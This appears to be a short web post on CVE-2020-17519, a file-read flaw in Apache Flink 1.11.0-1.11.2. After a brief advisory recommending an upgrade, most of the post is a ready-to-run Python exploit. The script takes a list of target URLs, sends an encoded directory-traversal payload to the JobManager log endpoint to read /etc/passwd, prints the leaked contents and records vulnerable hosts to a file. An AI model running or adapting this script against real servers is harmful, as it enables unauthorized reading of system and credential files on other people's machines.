Apache Flink 1.11.0-1.11.2 contains a flaw allowing hackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. To avoid exploitation it’s advised users upgrade to version Flink 1.11.3 or 1.12.0. Vulnerability listed as CVE-2020-17519
Exploit
#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are Apache Flink 1.11.0-1.11.2
import requests,sys,colorama
from colorama import *
init(autoreset=True)
banner='''\033[1;33;40m
_______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
\_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
'''
def verify():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()
response=requests.get(poc,headers=headers,timeout=15,verify=False)
if response.status_code==200 and "root:x" in response.content:
print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
print(response.content)
f=open('./vul.txt','a')
f.write(urls)
f.write('\n')
else:
print('\033[1;32;40m[-]{} None'.format(urls))
except:
print('{} request timeout'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-17519.py urls.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
if urls[-1]=='/':
urls=urls[:-1]
verify()
print ('Check Over')Please follow and like us:
